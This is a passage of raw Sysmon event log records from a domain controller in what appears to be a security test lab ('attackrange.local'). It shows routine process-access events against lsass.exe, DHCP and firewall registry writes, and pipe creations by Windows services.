12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646A-6064-0A00-00000000AE01}840920C:\Windows\system32\services.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646A-6064-0A00-00000000AE01}840936C:\Windows\system32\services.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.815{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.799{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.799{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\wcifs\Parameters\WppRecorder_TraceGuid{803cb23a-e32b-4200-bd82-d8a15919ac1b} 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x6064727c) 13241300x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x606470ba) 13241300x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x60646b74) 13241300x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x6064646c) 13241300x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 13241300x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 13241300x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000001) 17141700x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200\Winsock2\CatalogChangeListener-4b0-0C:\Windows\System32\svchost.exe 13241300x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\Dhcpv6StateDWORD (0x00000000) 17141700x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200\eventlogC:\Windows\System32\svchost.exe 11241100x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.752{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.706{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\DHCP\CollectionBinary Data 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 